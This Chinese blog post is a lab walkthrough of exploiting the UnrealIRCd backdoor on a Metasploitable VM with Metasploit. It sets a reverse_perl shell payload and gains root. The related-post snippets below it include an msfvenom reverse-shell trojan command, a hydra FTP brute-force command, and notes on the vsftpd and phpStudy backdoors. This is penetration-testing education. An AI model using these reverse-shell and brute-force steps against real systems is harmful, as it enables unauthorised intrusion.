避坑版UnreallRCd后门漏洞复现

于 2023-07-17 10:17:15 发布
阅读量872 收藏 8
点赞数 7
文章标签: linux 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69925635/article/details/131760526
版权
在KaliLinux环境下,通过OpenVAS发现Meta虚拟机中的一个高危后门漏洞(CVSS7.5)。使用msfconsole进行漏洞利用,设置参数,包括选择payload为cmd/unix/reverse_perl,设定RHOST为靶机IP,然后设置LHost。运行exploit后成功建立连接,获得root权限,后门安装完成。
摘要由CSDN通过智能技术生成

在使用openvas对meta虚拟机进行漏洞测试时,发现高危漏洞

 是一个CVSS:7.5的后门,现尝试实现

攻击机:kali linux ip:192.168.204.128

靶机:Metasploittable ip:192.168.204.130

首先在kali中启动msfconsole

 搜索漏洞库

 使用漏洞(这里也可以直接输入use 2)

 设置参数

 通过set RHOST命令锁定靶机IP

 这里直接run的话会报错:A payload has not been selected

Exploit completed,but no session was created.

 经过多次尝试找到错误原因,这里我们手动设置payload

set payload cmd/unix/reverse_perl

 再设置LHost

 最后run,显示成功连接,输入whoami,显示root

 后门实现完成

凝弈ny
关注
FTP后门漏洞复现(含有漏洞的vsftpd2.3.4)
顾蒅' Home
09-12 7283
FTP后门漏洞复现 0x01 漏洞简述 vsftpd-2.3.4 手工触发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。 0x02 风险等级 漏洞评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 FTP是文件传输协议(File Transfer Protocol)的缩写,是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型的第七层, TCP 模型的第四层, 即应用层, 使用 TCP 传输
kali linux对Metasploitable2漏洞利用,irc后门利用 笔记
边城浪子的博客
09-20 1324
IRC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊天。它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务。IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。它的特点是速度非常之快,聊天时几乎没有延迟的现象,并...
Metasploit溢出UnrealIRCd后门漏洞
weixin_34185320的博客
12-16 1017
Metasploit溢出UnrealIRCd后门漏洞利用UnrealIRCd后门漏洞,获取目标主机的root权限。某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程***者能够执行任意代码。一、利用nmap工具扫描目标主机1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。1.2在终端中...
Metasploitable2靶机之第八篇--UnreallRCd后门漏洞
千寻的博客
04-03 1314
文章目录环境漏洞利用摘抄 环境 漏洞利用 摘抄 “I am going to live every minute of it” 我将珍惜活着的每一分钟。 – 《心灵奇旅》
手把手教你kali渗透Metasploitable
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶机 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
Metasploitable2靶机渗透
weixin_51167520的博客
03-13 1948
Metasploitable2靶机渗透 实验环境:KALI Metasploitable2 Metasploitable2介绍 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。本2已经可以下载,并且比上一个本包含更多可利用的安全漏洞。这个本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 进行此次靶机练
MSF使用总结
qq_44657899的博客
09-25 4740
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
phpStudy backdoor 2019后门漏洞复现过程记录
牛奶栗的小博客
11-11 931
1)可以通过查看路径为PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll的文件,查找到@eval(%s('%s'));4、打开Burpsuite抓phpinfo.php页面的请求包,发送到Repeater重放器模块。部署在win10虚拟机里,解压后运行后访问localhost/phpinfo.php即成功安装。3)查看php.ini文件,检索到extension=php_xmlrpc.dll。2)查看php探针→PHP已编译模块检测,存在xmlrpc。
Ftp笑脸漏洞复现后门漏洞
qq_55857040的博客
12-13 5859
目录 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞 实验环境: 实验准备 实验过程 小总结 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4本的服务器的...
PhpStudy后门漏洞实战复现
la-大白
10-28 4938
phpstudy后门漏洞
Nginx漏洞复现
weixin_58163202的博客
02-08 1224
nignx漏洞复现
渗透测试实例:Metasploitable3靶机
lxy123_com的博客
02-09 4250
实验环境:Kali虚拟机一台、4G运行,Metasploitable3靶机一台,IP地址192.168.22.20 实验目的:对Metasploitable3靶机进行渗透测试 实验步骤: (一),对靶机进行扫描 1,使用Neuss对靶机进行扫描
meterpreter详解与渗透实战
热门推荐
成长
01-24 3万+
payload介绍,meterpreter详解,以及网络渗透实战(拿下老爸电脑)
【RABBITMQ】rabbitmq 产生的问题
Zsigner的博客
02-21 461
个人实践: 1、无法引入Could not transfer artifactspring-boot-starter-amqp 解决:指定parant 本号,不指定amqp本号就可以了 <parent> <groupId>org.springframework.boot</groupId> <artifa...
SQL注入之报错注入的一些随笔
郁离歌丶的博客
03-21 4576
0x00.序言关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()报错注入http:/...
metasploitable2 漏洞合集学习
qq_43233085的博客
02-05 4669
metasploitable2 漏洞合集学习弱密码 Weak PasswordSamba MS-RPC Shell命令注入漏洞Vsftpd 源码包后门漏洞UnreallRCd 后门漏洞Java RMI SERVER 命令执行漏洞Root用户弱口令漏洞(SSH爆破)Distcc 后门漏洞PHP CGI 参数注入执行漏洞Druby 远程代码执行漏洞Ingreslock 后门漏洞Rlogin 后门漏洞 ...
phpstudy后门漏洞复现
最新发布
09-06
根据引用中的信息,实际测试发现phpstudy2016PHP5.4、phpstudy2018php-5.2.17和php-5.4.45均存在后门漏洞。 根据引用中的信息,后门代码存在于\ext\php_xmlrpc.dll模块中。通过使用notepad打开该文件并搜索@...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值